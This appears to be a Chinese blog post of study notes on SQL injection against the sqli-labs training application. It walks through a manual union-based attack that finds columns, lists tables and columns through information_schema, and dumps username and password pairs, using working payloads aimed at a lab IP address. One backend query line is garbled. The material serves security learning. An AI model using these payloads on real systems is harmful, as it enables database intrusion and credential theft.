sql注入Less-2

后台sql

s q l = " S E L E C T ∗ F R O M u s e r s W H E R E i d = sql = "SELECT * FROM users WHERE id= sql="SELECTFROMusersWHEREid=id LIMIT 0,1";

注入语句

http://192.168.200.26/Less-3/?id=-1? union select 1,2,database();–+

使用id=-1 便可以显示union的内容了
使用–+注释掉 limit后面的内容

group_concat(table_name) 去重

通过回显判断闭合方式
在这里插入图片描述

尝试手工注入流程:

1.判断有无注入点 and 1 = 1; true

SQL注入:
随便输入内容 == 报错 注入
== 没有注入

2.猜解列名数量 order by %20 空格

	字段 4个

3.报错,判断回显点 union

4.信息收集

数据库版本 version()
高版本:5.0
系统库: infromation 。。。
数据库名称:database()
低版本:5.0 (低版本没有系统库)

5.使用对应SQL进行注入

查询出表名

	数据库库名:security
	. 下一级  
	infromation_schema.tables 查找表名
	table_name
	查询serurity库下面 所有的表名 

	database()


	= 前后 连到一起
	union select 1,group_concat(table_name),3 from information_schema.tables
	where table_schema=database()

查询出所以密码

	表: users
	如何查询表里面有那些字段? 
	user 字符 转行 16进制
	union select 1,group_concat(column_name),3 from information_schema.columns
	where table_name=0x7573657273

	username  password  字段数据  
	select username,password from users
	0x3a  :
	union select 1,2,(select group_concat(username,0x3a,password)from users)
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值